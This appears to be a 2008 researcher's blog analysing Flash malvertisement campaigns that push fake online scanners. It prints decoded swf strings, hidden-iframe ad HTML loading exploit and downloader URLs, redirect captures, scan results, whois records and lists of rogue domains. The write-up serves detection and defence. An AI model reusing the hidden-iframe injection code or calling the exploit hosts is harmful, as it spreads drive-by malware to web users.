<h4></h4>
Remember I did mention a different way to exploit redirects a couple of days ago and the shockwave exploit covered by Kaspersky?

Well it all started last night when I got a popup for a fake online scanner without seeing a Flash malvertizement. So I had to digg a bit further as usual. Going back to the site and stumbling on the same advertisement revealed something interesting in the network capture ... an encoded / obfuscated script as seen below. It might not be the exact source of the fake scanner as I didn't get redirected at the time of the write up. It remains captivating though as it covers yet another aspect of malicious action scripts used in Flash content.

Since I'm curious, I feel the need to decode when possible and what a nifty surprise when I discovered that the script does test which Flash version is installed and leads to a tiny swf file named july1st-firefox-intro.swf.

Inside july1st-firefox-intro.swf we discover 4 important strings:

CODE

String
value: /:$version
String
value: http://202.75.35.72/h/ff/
String
value: i.swf
String
value: _root

Seeing those strings, I realized I did fall on the exploit mentioned in the Kaspersky blog. Further analysis of the file shows that an evolution in obfuscation has taken place. The action script code has been encrypted to better hide the code from researchers.

The initial swf file doesn't have any images either as seen below, just 1 frame and the obfuscated actionscript.

Upon "execution", the value of the Flash Player is added to the i.swf, being WIN 9,0,47,0 for me.

july1st-firefox-intro.swf is part of a bigger "hijack" by adverts. For more information on the main exe file, please refer to Trojan-Downloader.Win32.Firu.al. The Flash exploit has been added to the infection discovered a couple of days ago.

1. Banner to be displayed: 247mediadirect.com/ad/images/468x60/40381.gif
2. exe file: script at 247mediadirect.com/jh/f.php?id=9600 which leads to exe
3. swf file: script at 202.75.35.72/z?i=1&n=6f743fe3724e01adbd202e04be8109e9&t=1215589262

CODE

<HTML><BODY><A HREF="http://247mediadirect.com/action/1/9600/98" TARGET="_blank"><IMG SRC="http://247mediadirect.com/ad/images/468x60/40381.gif"></A><iframe src="http://247mediadirect.com/jh/f.php?id=9600"  frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=1 height=1></iframe></BODY></HTML><iframe src="http://202.75.35.72/z?i=1&n=6f743fe3724e01adbd202e04be8109e9&t=1215589262"  frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=1 height=1></iframe>

<h4></h4>
Filename: july1st-firefox-intro.swf

File size: 1332 bytes
MD5...: 47e99b0f5c97e6208d7bab6fa5be8991
SHA1..: 325de729cae0fed62fe47a78bcd9270c31308056
SHA256: cf98da052701fbcaa824f4b489379a6ec5c85237eebba8b8b1499b07ecb21681
PEiD..: -

QUOTE

File july1st-firefox-intro.swf received on 07.09.2008 01:55:09 (CET)
AhnLab-V3 2008.7.9.0 2008.07.08 -
AntiVir 7.8.0.64 2008.07.08 -
Authentium 5.1.0.4 2008.07.08 -
Avast 4.8.1195.0 2008.07.08 SWF:Downloader
AVG 7.5.0.516 2008.07.08 -
BitDefender 7.2 2008.07.08 -
CAT-QuickHeal 9.50 2008.07.08 -
ClamAV 0.93.1 2008.07.09 -
DrWeb 4.44.0.09170 2008.07.08 -
eSafe 7.0.17.0 2008.07.08 -
eTrust-Vet 31.6.5937 2008.07.08 -
Ewido 4.0 2008.07.08 -
F-Prot 4.4.4.56 2008.07.08 -
F-Secure 7.60.13501.0 2008.07.08 -
Fortinet 3.14.0.0 2008.07.08 -
GData 2.0.7306.1023 2008.07.08 SWF:Downloader
Ikarus T3.1.1.26.0 2008.07.09 -
Kaspersky 7.0.0.125 2008.07.09 -
McAfee 5334 2008.07.08 -
Microsoft 1.3704 2008.07.09 -
NOD32v2 3252 2008.07.08 -
Norman 5.80.02 2008.07.08 -
Panda 9.0.0.4 2008.07.08 -
Prevx1 V2 2008.07.09 -
Rising 20.52.12.00 2008.07.08 -
Sophos 4.31.0 2008.07.08 -
Sunbelt 3.1.1509.1 2008.07.04 -
Symantec 10 2008.07.09 -
TheHacker 6.2.96.374 2008.07.07 -
TrendMicro 8.700.0.1004 2008.07.08 -
VBA32 3.12.6.8 2008.07.08 -
VirusBuster 4.5.11.0 2008.07.08 -
Webwasher-Gateway 6.6.2 2008.07.08 -

<h4></h4>
Some fascinating background information about 247mediadirect.com & 202.75.35.72 is available on Sandi's blog.

<h4></h4>
Incredible isn't it ? Another malvertizement featuring MediaMan is present:

• on the main page of isuisse & iquebec
• on the websites hosted on ibelgique & ifrance

How is this possible, I just can't believe it. I got hit by it just after the Forex AutoPilot malvert which is still rotating too.

Screenshot in situ.

Banner.

image.ifrance.com/img/pub/atlantmedia/imediaman728x90.swf

Campaign.

statgroup.net/crossdomain.xml
statgroup.net/c/index.php?id=[removed]

profitabill.com/?cmpid=asbarrator

profitabill.com/?cmpid=asbarrator ... This is the same link as seen in the XM Radio malvertizement. Other interesting point, I think imediaman728x90.swf has been acquired very recently by iEUROP, the date being 9th of July 2008 - 6:12 PM

Very often we notice that websites leave the advertiser's name as a folder's name on their server. Here we see a mention of atlantmedia, so that deserves some digging.

<h4></h4>
atlantmedia.net - 87.251.53.87

Website Title: Atlant Media
ICANN Registrar: TLDS, LLC DBA SRSPLUS
Created: 2008-04-14
Expires: 2009-04-14
Updated: 2008-05-16
Name Server: NS1.ATLANTMEDIA.NET (has 1 domains) - 208.79.82.50
Name Server: NS2.ATLANTMEDIA.NET - 208.79.82.66
Name Server: NS3.ATLANTMEDIA.NET - 77.73.98.2
Name Server: NS4.ATLANTMEDIA.NET - 77.73.98.4
Whois Server: whois.srsplus.com

Server Type: Apache/2.2.3 (Debian)
IP Address: 87.251.53.87
IP Location - Netherlands - Bit
Dedicated Hosting: atlantmedia.net is hosted on a dedicated server.

Registrant:
Samanta Lipton (mail@atlantmedia.net)
6 South Avenue
Kingston, NONE 0121
JM
876 920 8447

Domain Name: atlantmedia.net

Administrative, Technical, Billing Contact:
Samanta Lipton (mail@atlantmedia.net)
6 South Avenue
Kingston, NONE 0121
JM
876 920 8447

Domain Service Provider:
SoftSolutions Inc

Regular readers will already have noticed the NS servers which are well known by us. The rest is self-explicit.

domains sharing nameservers.

1. 30plusbill.com
2. ad2profit.com
3. adgurman.com
4. adioserrores.com
5. adnetserver.com
6. adsadvertisment.com
7. adsolutio.com
8. advancedcleaner.com
9. adverdaemon.com
10. advertismentad.com
11. advertprofit.net
12. ahorrememoria.com
13. alfaantivirus.com
14. alltiettantivirus.com
15. anchisupaisutsu.com
16. anchiwamu2008.com
17. antiespiadorado.com
18. antiespionspack.com
19. antigusanos2008.com
20. antimalwareguard.com
21. antispionagepro.com
22. antispypremium.com
23. antispywarecontrol.com
24. antispywareexpert.com
25. antispywaremaster.com
26. antispywaresuite.com
27. antiver2008.com
28. antivirusaskeladd.com
29. antivirusfiable.com
30. antivirusforall.com
31. antivirusforalla.com
32. antivirusfueralle.com
33. antivirusgenial.com
34. antivirusmagique.com
35. antiviruspcpakke.com
36. antiviruspcsuite.com
37. antiviruspertutti.com
38. antivirusscherm.com
39. antiworm2008.com
40. antiwurm2008.com
41. archivoprotector.com
42. astalaprofit.com
43. avsystemcare.com
44. avsystemshield.com
45. barreraintegral.com
46. barrevirus.com
47. bastioneantivirus.com
48. bedreigingsmonitoor.com
49. beschermingstool.com
50. bestsellerantivirus.com
51. besutohogo.com
52. billingbit.com
53. bizadsonline.net
54. bizadvert.net
55. bizmarketads.com
56. bogyotsuru.com
57. bortmedvirus.com
58. bugaganetwork.com
59. bugdokter.com
60. bugsdestroyer.com
61. cerovirus.com
62. controledemenaces.com
63. cryptdrive.com
64. debellaworm2008.com
65. defensaantimalware.com
66. defensaantivirus.com
67. defensedudisque.com
68. defensenetsurfage.com
69. diannaoqingjieji.com
70. digitalerschutz.com
71. discerrorfree.com
72. discoseguro.com
73. discosemerros.com
74. discosenzaerrori.com
75. discosinerrores.com
76. diskfejlfri.com
77. diskrensare.com
78. diskretter.com
79. disqudurprotection.com
80. dobleproteccion.com
81. doraibuhogo.com
82. downloadcontrol.com
83. drivecleaner.com
84. drivedefender.com
85. driveproteccion.com
86. dwnld1.com
87. easydownloadsoft.com
88. easyfixer.com
89. einaprivadesapc.com
90. elmejorantivirus.com
91. elmejorcuidado.com
92. erreurchasseur.com
93. errorfri.com
94. errorout.com
95. errorprotector.com
96. errorsafe.com
97. errorskydd.com
98. errorsoshi.com
99. exterminadordevirus.com
100. fairukyua.com
101. fehlerbeseitiger.com
102. fejlrenser.com
103. festplattencleaner.com
104. festplattenreiniger.com
105. fiksdinpc.com
106. filtrodetrojan.com
107. filtrototal.com
108. filtrotroiani.com
109. fullsystemprotection.com
110. geeninfectie.com
111. glorymarkets.com
112. goldenantispy.com
113. googiesindication.com
114. gorudenanchisupai.com
115. hadodoraibugado.com
116. harddiskvakt.com
117. harddrivefilter.com
118. harddriveguard.com
119. inhaltspeicher.com
120. internetanonymizer.com
121. intervarioclick.com
122. keinegefahr.com
123. konsekieraser.com
124. kyoikanshi.com
125. kyouikyuuen.com
126. libresystem.com
127. limpietodo.com
128. malwareschutz.com
129. maximumantivirus.com
130. meinbesterschutz.com
131. menacecontrole.com
132. menacerescue.com
133. menacesecure.com
134. menacesprotection.com
135. miavcompleto.com
136. minnesparere.com
137. mistikotitatuipologisti.com
138. moncontenuassistant.com
139. munazifalhasob.com
140. mythmarketing.com
141. nettordinateur.com
142. nettoyeurdepc.com
143. neuerschild.com
144. nientetracce.com
145. nocompromaat.com
146. norwayvirus.com
147. nowayvirus.com
148. oczyszczaczkomputerza.com
149. onerateld.com
150. onlinehelpmate.com
151. onlinepcguard.com
152. orantiespion.com
153. ordureffaceur.com
154. pc-prot.com
155. pcantivirenloesung.com
156. pcbeskyttelse.com
157. pckairyo.com
158. pcprivacycleaner.com
159. pcprivacytool.com
160. pcpropre.com
161. pcrengoringsmaskine.com
162. pcsecuresystem.com
163. pcsegura.com
164. pcsentineru.com
165. pcsiemprenueva.com
166. pcsikker.com
167. pcsikkerhed.com
168. pcsod.com
169. pcsupernanny.com
170. pcvirusless.com
171. pembersihkomputer.com
172. plattefehlerfrei.com
173. popadprovider.com
174. poupememoria.com
175. pp-total.com
176. prevedmarketing.com
177. privacidadeprotegida.com
178. privacyprotector.com
179. profitabill.com
180. proteccionconfiable.com
181. protectdownloads.com
182. protectingtool.com
183. protectionassuree.com
184. protectionconue.com
185. protejaseudrive.com
186. protejasudrive.com
187. protezionefidata.com
188. protezionesoft.com
189. puliturasystem.com
190. r2d2adverising.com
191. regrensere.com
192. rejishufuku.com
193. reparateurdesysteme.com
194. rescatedeamenazas.com
195. riendevirus.com
196. rocktheads.com
197. safetydownload.com
198. sanitardiska.com
199. savecapacite.com
200. schijfbewaker.com
201. schijfhersteller.com
202. schutztool.com
203. securepccleaner.com
204. semerros.com
205. senzadoppioni.com
206. senzaerrori.com
207. sichererantivirus.com
208. sichererschutz.com
209. sikkerpcvaerktoj.com
210. sistemadedefensa.com
211. sistemaimune.com
212. skyddsverktyg.com
213. sletingenvirus.com
214. software-payment.com
215. solutionreg.com
216. speicherschutz.com
217. stoltbeskyttelse.com
218. storageguardsoft.com
219. storageprotector.com
220. suiteantispyware.com
221. sumejorantivirus.com
222. supashuri.com
223. suspenzorpc.com
224. sutoppuwirusu.com
225. sysdepannage.com
226. syskontroller.com
227. syslibero.com
228. sysprotect.com
229. systemdoctor.com
230. systemerrorfixer.com
231. systemesansvirus.com
232. systemordnare.com
233. toolsicuro.com
234. topsalgantivirus.com
235. toroianfiruta.com
236. trasheraser.com
237. trojanerfilter.com
238. trojansfilter.com
239. trojansfiltre.com
240. trustedantivirus.com
241. trustedprotection.com
242. tryggdator.com
243. tryggpcverktyg.com
244. turvapc.com
245. vacinatotal.com
246. veiligheidsagent.com
247. vipantispyware.com
248. virenfrierpc.com
249. virtualcoin.net
250. virtualpcguard.com
251. viruscontrolleuer.com
252. virusdeteccion.com
253. virusdifesa.com
254. viruseffaceur.com
255. virusforsvar.com
256. virusfrittsystem.com
257. virusremover2008.com
258. virusstopper.net
259. virusuwadame.com
260. virusvakt.com
261. virusvanguard.com
262. viruswacht.com
263. votremeilleurantivirus.com
264. waytotheprofit.com
265. winanonymous.com
266. winantispyware.com
267. winantivirus.com
268. winantiviruspro.com
269. winfixer.com
270. winpcdoctor.com
271. winsecureav.com
272. winsoftware.com
273. winspycontrol.com
274. yourprivacyguard.com
275. yuzasefu.com
276. zebraantivirus.com
277. zeusantivirus.com

No doubt, Atlant Media is yet another dodgy, bad advertising company. If you have been approached by people representing them check your creatives please at Adopstools or contact us.

<h4></h4>
Courtesy of Sandi.

Classmates.

More info.
______________________________

Skype.

More info.

<h4></h4>
The bad guys are pulling of a new stunt when you are a victim of a redirect. Everyone has already used copy and paste at least once in his / her life to pass links into your browser. Upon the redirect, one of the bad URL is copied into your clipboard. So let's presume that just before it happed you had a website link in your clipboard, the redirect happens, you close all your windows with ALT+F4 and you decide to go back to the initial website using the paste function ... Wrong because you now have a bad URL in your clipboard.

How to get quickly rid of it?

1. Click Start > Run
2. In the edit box type clipbrd followed by enter.
3. The actual content of the clipboard will be displayed.
   
4. Click the delete button and confirm by Yes.

Furthermore I did notice that they had wiped isuisse.com (where the redirect did occur) from my Internet History list.

<h4></h4>
Ever wondered why so many malicious banners are laying around on Internet? Well here is another method of spreading malvertizements. The banner is 1 year old (gives an idea how long these redirects are going on already) ... it's the method used by those scammers that is disgusting.

You love Myspace / Xanga / Friendster / Hi5 stuff? Let's head towards www.funmunch.com then. See the Myspace Banners link?

When clicked, you are taken to the banner directory and wow a Flash file ...

Banner.

www.funmunch.com/banners/media.swf

Adopstools Test.

http://www.adopstools.com/index.asp?page=quicklink&id=2907h69B4n4rNAc1

Before using Flash banners on your MySpace profile (or elsewhere) check if they are clean at Adops Tools!!!

<h4></h4>
Courtesy of Sandi.

Dreammates.

Note: Rescaled due to visibility - original size: 800x600

Campaign.

page2.googiesindication.com/c/index.php?id=[removed]
waytotheprofit.com/?cmpid=noanalysis&adid=intl

More info.
______________________________

Much Music.

Campaign.

statgroup.net/c/index.php?id=[removed]
waytotheprofit.com/?cmpid=ontitivate&adid=intl

More info.

<h4></h4>
Two new friends of our well known adtds.trackads.net / adtds2.promoplexer.com domains are active.

internetsecuritydeluxe.com - 67.205.75.12

CODE

GET /in.cgi?22 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: adtds.trackads.net
Connection: Keep-Alive

HTTP/1.1 302 Found
Set-Cookie: SL_22_0000=_2_; domain=adtds2.promoplexer.com; path=/; expires=Tue, 15-Jul-2008 23:35:33 GMT
Location: http://internetsecuritydeluxe.com/scanner/scan.php?landid=2&depid=&cid=&parid=&bs=1
Content-type: text/html
Content-Length: 294
Date: Mon, 14 Jul 2008 23:35:33 GMT
Server: lighttpd/1.5.0

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://internetsecuritydeluxe.com/scanner/scan.php?landid=2&depid=&cid=&parid=&bs=1'">
</head>
<body>
document moved <a href="http://internetsecuritydeluxe.com/scanner/scan.php?landid=2&depid=&cid=&parid=&bs=1">here</a>
</body>
</html>

Website Title: .: InternetSecurityDeluxe - the best antispyware, antimalware ever :.

ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-04-22
Expires: 2009-04-22
Updated: 2008-06-27
Name Server: NS.INTERNETSECURITYDELUXE.COM (has 1 domains)
Name Server: NS1.INTERNETSECURITYDELUXE.COM
Name Server: NS2.INTERNETSECURITYDELUXE.COM
Whois Server: whois.estdomains.com

Server Type: lighttpd/1.4.18
IP Address: 67.205.75.12
IP Location - Ukraine - Individual

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: INTERNETSECURITYDELUXE.COM

Registrant:
Ind
Vasil pentykovich (leonardo126@gmail.com)
Ny tipa normalnij address
Shoblo
Other,20365
PR
Tel. +023.2569856
Fax. +023.5565599

Administrative Contact:
Ind
Vasil pentykovich (leonardo126@gmail.com)
Ny tipa normalnij address
Shoblo
Other,20365
PR
Tel. +023.2569856
Fax. +023.5565599

Technical Contact:
Ind
Vasil pentykovich (leonardo126@gmail.com)
Ny tipa normalnij address
Shoblo
Other,20365
PR
Tel. +023.2569856
Fax. +023.5565599

Billing Contact:
Ind
Vasil pentykovich (leonardo126@gmail.com)
Ny tipa normalnij address
Shoblo
Other,20365
PR
Tel. +023.2569856
Fax. +023.5565599
______________________________

scanner.vav-scan.com / *.vav-scan.com - 92.241.182.16

CODE

GET /in.cgi?2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: adtds.trackads.net
Connection: Keep-Alive

HTTP/1.1 302 Found
Set-Cookie: SL_2_0000=_6_; domain=adtds2.promoplexer.com; path=/; expires=Tue, 15-Jul-2008 23:38:30 GMT
Set-Cookie: SL_12_0000=_3_; domain=adtds2.promoplexer.com; path=/; expires=Tue, 15-Jul-2008 23:38:30 GMT
Location: http://scanner.vav-scan.com/29/?advid=4925&ref=&p=1000000000
Content-type: text/html
Content-Length: 248
Date: Mon, 14 Jul 2008 23:38:30 GMT
Server: lighttpd/1.5.0

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://scanner.vav-scan.com/29/?advid=4925&ref=&p=1000000000'">
</head>
<body>
document moved <a href="http://scanner.vav-scan.com/29/?advid=4925&ref=&p=1000000000">here</a>
</body>
</html>

Website Title: Welcome to nginx!

ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-05-28
Expires: 2009-05-28
Updated: 2008-07-14
Name Server: NS1.VAV-SCAN.COM (has 1 domains)
Name Server: NS2.VAV-SCAN.COM
Whois Server: whois.estdomains.com

IP Address: 92.241.182.16
IP Location - Russian Federation - Wahome Colocation

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: VAV-SCAN.COM

Registrant:
Sawert Alliance ltd.
Leonid Sherbakov (selevitenterprises@gmail.com)
P.O. Box 3567, Road Town
Tortola
Not Applicable,N/A
VG
Tel. +7.9602578790

Administrative Contact:
Sawert Alliance ltd.
Leonid Sherbakov (selevitenterprises@gmail.com)
P.O. Box 3567, Road Town
Tortola
Not Applicable,N/A
VG
Tel. +7.9602578790

Technical Contact:
Sawert Alliance ltd.
Leonid Sherbakov (selevitenterprises@gmail.com)
P.O. Box 3567, Road Town
Tortola
Not Applicable,N/A
VG
Tel. +7.9602578790

Billing Contact:
Sawert Alliance ltd.
Leonid Sherbakov (selevitenterprises@gmail.com)
P.O. Box 3567, Road Town
Tortola
Not Applicable,N/A
VG
Tel. +7.9602578790

Websites.

1. Vav-scan.com
2. Vav-scanner.com
3. Vavscan.com

<h4></h4>
Courtesy of Sandi.

Levi's.

More info.
______________________________

Lexus - myownpoursuit.com.

More info.
______________________________

Lady SpeedStick.

The original malvertizement has been replaced with a "cleaned" one already. We have seen this happen before when hosted on their own "advert servers".
More info.
______________________________

XM Radio.

Another sample of XM Radio featuring the same campaign as the one seen on ifrance & co.
More info.

<h4></h4>
Another Flash file, smaller as the one mentioned here because packed this time (packers Kaspersky: Swf2Swc) and a new domain, 21centmedia.com which is serving the same exploits and redirects as 247mediadirect.com. Ref.

Again we see a script to decode.

Decoded we see again the same Flash test and a link to a tiny swf file named ff.swf.

Inside ff.swf we discover 4 important strings:

CODE

String
value: /:$version
String
value: http://209.47.164.209/h/ff/
String
value: swf
String
value: _root

The action script code has been encrypted again, ff.swf doesn't have any images either. Upon "execution", the value of the Flash Player is added to the swf, being WIN 9,0,47,0 for me.
Whoops sloppy coders, they kinda messed up this one since the dot is missing between the filename & file extension.

CODE

GET /h/ff/WIN%209,0,47,0swf HTTP/1.1
Accept: */*
Referer: [removed]
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 209.47.164.209
Connection: Keep-Alive

Complete exploit:

CODE

<HTML><BODY><A HREF="http://21centmedia.com/route/1/5919/117" TARGET="_blank"><IMG SRC="http://21centmedia.com/banner/images/468x60/84489.jpg"></A><iframe src="http://21centmedia.com/xo/a.php?id=5919"  frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=1 height=1></iframe></BODY></HTML><iframe src="http://209.47.164.209/z?i=1&n=4f6e8320e1ae5ca898cca282b69215e5&t=1216170914"  frameborder=0
marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=1 height=1></iframe>

<h4></h4>
Filename: ff.swf

File size: 764 bytes
MD5...: d8081ca147f2369b0862db2341e8aa0d
SHA1..: 0c07fb184060123006a1edb4587cfd040abc2ab4
SHA256: 51de9f0d310f933f5d92466a5bd754b50effc4b39c38a506d3a7ea2c8f8a6fa9
PEiD..: -

QUOTE

File ff.swf received on 07.16.2008 03:36:03 (CET)
AhnLab-V3 2008.7.11.0 2008.07.15 -
AntiVir 7.8.0.68 2008.07.15 -
Authentium 5.1.0.4 2008.07.15 -
Avast 4.8.1195.0 2008.07.15 SWF:Downloader
AVG 7.5.0.516 2008.07.15 -
BitDefender 7.2 2008.07.16 -
CAT-QuickHeal 9.50 2008.07.15 -
ClamAV 0.93.1 2008.07.16 -
DrWeb 4.44.0.09170 2008.07.15 -
eSafe 7.0.17.0 2008.07.15 -
eTrust-Vet 31.6.5956 2008.07.15 -
Ewido 4.0 2008.07.15 -
F-Prot 4.4.4.56 2008.07.15 -
F-Secure 7.60.13501.0 2008.07.16 -
Fortinet 3.14.0.0 2008.07.16 -
GData 2.0.7306.1023 2008.07.16 SWF:Downloader
Ikarus T3.1.1.26.0 2008.07.16 Virus.SWF.Downloader
Kaspersky 7.0.0.125 2008.07.15 -
McAfee 5339 2008.07.15 -
Microsoft 1.3704 2008.07.15 -
NOD32v2 3270 2008.07.15 -
Norman 5.80.02 2008.07.15 -
Panda 9.0.0.4 2008.07.15 -
Prevx1 V2 2008.07.16 -
Rising 20.53.12.00 2008.07.15 -
Sophos 4.31.0 2008.07.16 -
Sunbelt 3.1.1536.1 2008.07.15 -
Symantec 10 2008.07.16 -
TheHacker 6.2.96.381 2008.07.16 -
TrendMicro 8.700.0.1004 2008.07.15 -
VBA32 3.12.8.0 2008.07.15 -
VirusBuster 4.5.11.0 2008.07.15 -
Webwasher-Gateway 6.6.2 2008.07.16 -

<h4></h4>
Same registrant as 247mediadirect.com.

21centmedia.com - 209.47.164.209.

Website Title: None given.
ICANN Registrar: INTERCOSMOS MEDIA GROUP, INC. D/B/A DIRECTNIC.COM
Created: 2008-05-29
Expires: 2009-05-29
Updated: 2008-05-29
Name Server: NS0.DIRECTNIC.COM (has 354,650 domains)
Name Server: NS1.DIRECTNIC.COM
Whois Server: whois.directnic.com

IP Address: 209.47.164.209
IP Location - United States - Mci Communications Services Inc. D/b/a Verizon Business
Dedicated Hosting: 21centmedia.com is hosted on a dedicated server.

Registrant:
Media Hosting Ltd.
32 Jacka Blvd
St Kilda VIC, Melbourne 3182
AU
+61-03-9534-52830

Domain Name: 21CENTMEDIA.COM

Administrative Contact:
Pearson, Ross
32 Jacka Blvd
St Kilda VIC, Melbourne 3182
AU
+61-03-9534-52830

Technical Contact:
Pearson, Ross
32 Jacka Blvd
St Kilda VIC, Melbourne 3182
AU
+61-03-9534-52830

Record expires on 05-29-2009
Record created on 05-29-2008

Domain servers in listed order:
NS0.DIRECTNIC.COM 69.46.233.245
NS1.DIRECTNIC.COM 69.46.234.245

<h4></h4>
Forwarded to us by a contact. The TravelWise malvertizement has been seen in the past in its 460x60 version on different occasions.

• First discovered on April 3th.
• Live on Photobucket on April 12th.
• Live on Release Log on May 9th.

Today a 728x90 version of this banner is circulating.

Banner.

Campaign.

stathisranch.com/c/index.php?id=[removed]
waytotheprofit.com/?cmpid=usboeotian&adid=intl

<h4></h4>
adtds.trackads.net / adtds2.promoplexer.com have activated a new domain: softtraf.com

softtraf.com/go.php?id=[removed]

Depending on the id= people will get redirected to different fake online scanners. At Domain Tools, softtraf.com is still listed under 92.241.182.14 but the website actually resolves to 91.208.0.244.
scanner.vav-scan.com has been moved into that range also. We notice a couple of other domains that correspond to the id= redirects.

softtraf.com - 91.208.0.244

Registry Data
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-05-16
Expires: 2009-05-16
Updated: 2008-07-16
Registrar Status: ok
Name Server: ns1.softtraf.com 91.208.0.244
Name Server: ns2.softtraf.com 220.196.42.220
Whois Server: whois.estdomains.com

Whois Record
Domain Name: SOFTTRAF.COM

Registrant:
Sawert Alliance ltd.
Peltonen Martti (seodancer@gmail.com)
Jeledoroznaya str. 14
Volovoso
Leningradskaya oblast,188410
RU
Tel. +7.9218901266

Administrative Contact:
Sawert Alliance ltd.
Peltonen Martti (seodancer@gmail.com)
Jeledoroznaya str. 14
Volovoso
Leningradskaya oblast,188410
RU
Tel. +7.9218901266

Technical Contact:
Sawert Alliance ltd.
Peltonen Martti (seodancer@gmail.com)
Jeledoroznaya str. 14
Volovoso
Leningradskaya oblast,188410
RU
Tel. +7.9218901266

Billing Contact:
Sawert Alliance ltd.
Peltonen Martti (seodancer@gmail.com)
Jeledoroznaya str. 14
Volovoso
Leningradskaya oblast,188410
RU
Tel. +7.9218901266

Websites.

1. Pornonod.com
2. Softtraf.com
3. Softtrafik.com
4. Software-traff.com
5. Software-traffic.com
6. Softwaretraff.com

______________________________

91.208.0.241

*.privacy-watcher.com CNAME
ns1.privacy-watcher.com A
ns1.winsafer.com A
privacy-watcher.com A
scanner.privacy-watcher.com CNAME
winsafer.com A
______________________________

91.208.0.244

*.softtraf.com CNAME
*.softtrafik.com CNAME
mail.softtraf.com A
mail.softtrafik.com A
ns1.softtraf.com A
ns1.softtrafik.com A
softtraf.com A
softtrafik.com A
______________________________

91.208.0.246

*.vav-scan.com CNAME
*.vav-x-scanner.com CNAME
mail.vav-scan.com A
mail.vav-x-scanner.com A
ns1.vav-scan.com A
ns1.vav-x-scanner.com A
ns2.vav-scan.com A
ns2.vav-x-scanner.com A
scanner.vav-scan.com CNAME
scanner.vav-x-scanner.com CNAME
vav-scan.com A
vav-x-scanner.com A
______________________________

91.208.0.250

ns2.winxprotector.com A
______________________________

91.208.0.252

*.anvi-scanner.com CNAME
anvi-scanner.com A
mail.anvi-scanner.com A
ns1.anvi-scanner.com A
ns2.anvi-scanner.com A
scanner.anvi-scanner.com CNAME
______________________________

220.196.42.220

*.magicantispy.com CNAME
*.malware-alarm.com CNAME
*.malwarealarm.com CNAME
*.scanner.xmalwarealarm.com CNAME
*.winxprotector.com CNAME
malware-alarm.com A
malwarealarm.com A
ns1.malware-alarm.com A
ns1.malwarealarm.com A
ns1.winxdefender.com A
ns1.winxprotector.com A
ns2.malwarealarm.com A
ns2.malwscan.com A
ns2.softtraf.com A
ns2.softtrafik.com A
ns2.watcher-scan.com A
ns2.winxdefender.com A
ns3.winxprotector.com CNAME
scanner.xmalwarealarm.com CNAME
spyshredderscanner.com A
winsafesurf.com A
winxdefender.com A
winxprotector.com A
www.scanner.xmalwarealarm.com CNAME

Websites (According to Domain Tools).

1. Adwareremover2007.com
2. Drives-cleaner.com
3. Magicantispy.com
4. Malware-alarm.com
5. Malwarealarm-scanner.com
6. Malwarealarm.com
7. Malwarealarms.com
8. Spy-shredder.com
9. Spy-xshredder.com
10. Spyshredder-scanner.com
11. Spyshredderscanner.com
12. Spyware-sweeper.net
13. Thecleanersystem.com
14. Vsoftstore.com
15. Windowsafesurf.com
16. Winsafesurf.com
17. Winsavesurf.com
18. Winxdefender.com
19. X-malwarealarm.com
20. Xmalwarealarm.com
21. Xspy-shredder.com
22. Xxxmovieshare.com

______________________________

Information related to '91.208.0.0 - 91.208.0.255'

inetnum: 91.208.0.0 - 91.208.0.255
netname: STILLTRADE-NET
descr: Still Trade Ltd
country: RU
org: ORG-STIL1-RIPE
admin-c: PERE1-RIPE
tech-c: PERE1-RIPE
status: ASSIGNED PI
notify: lexa@wahome.ru
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-by: STILLTRADE-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-routes: STILLTRADE-MNT
mnt-domains: STILLTRADE-MNT
changed: hostmaster@ripe.net 20080625
source: RIPE

organisation: ORG-STIL1-RIPE
org-name: Still Trade Ltd
org-type: OTHER
address: Russian Federation,
address: St. Petersburg, Fedosenko st, 30 liter A, 24-N
e-mail: corp@still-trade.com
mnt-ref: RU-WEBALTA-MNT
mnt-by: STILLTRADE-MNT
changed: lexa@wahome.ru 20080624
source: RIPE

person: Perevitskiy Sergey
address: Russian Federation,
address: St. Petersburg, Fedosenko st, 30 liter A, 24-N
mnt-by: STILLTRADE-MNT
abuse-mailbox: abuse@still-trade.com
e-mail: perevitzky.sergey@still-trade.com
phone: +7 (960) 257-87-90
nic-hdl: PERE1-RIPE
changed: lexa@wahome.ru 20080624
source: RIPE

Information related to '91.208.0.0/24AS47486'

route: 91.208.0.0/24
descr: Still Trade Ltd
origin: AS47486
mnt-by: STILLTRADE-MNT
changed: lexa@wahome.ru 20080625
source: RIPE
______________________________

Information related to '220.192.0.0 - 220.207.255.255'

inetnum: 220.192.0.0 - 220.207.255.255
netname: UNICOM
descr: China United Telecommunications Corporation
descr: No.133,Taiyun Building,Xidan North Street
descr: Xicheng District,Beijing,China
country: CN
admin-c: JY1446-AP
tech-c: JY1446-AP
mnt-by: MAINT-CNNIC-AP
mnt-lower: MAINT-CNNIC-AP
mnt-routes: MAINT-CNNIC-AP
status: ALLOCATED PORTABLE
changed: ipas@cnnic.cn 20070731
changed: hm-changed@apnic.net 20070802
source: APNIC

person: Jin Yang
address: No.133,Taiyun Building,Xidan North Street
